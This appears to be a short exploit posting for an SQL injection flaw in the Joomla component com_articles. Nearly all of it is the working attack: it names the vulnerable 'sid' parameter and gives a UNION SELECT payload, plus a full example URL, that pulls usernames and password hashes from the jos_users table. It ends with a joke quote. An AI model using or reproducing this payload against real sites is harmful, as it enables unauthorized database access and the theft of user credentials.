1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
**************************************************************************** Joomla Component com_articles SQL Injection Vulnerability **************************************************************************** # Vulnerability: Joomla Component com_articles SQL Injection Vulnerability # email: Pratulag@yahoo.com # Author : Pratul Agrawal ************************************************ ExploiT ******************************************************* [*] Vulnerable File : http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=[SQL] [*] ExploiT : 9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users— [*] Example : http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users— ******************************************************************************************************************** # If you have any questions, comments, or concerns, feel free to contact me. Quote of the day -"I'm an excellent housekeeper. Every time I get a divorce, I keep the house." hE He he |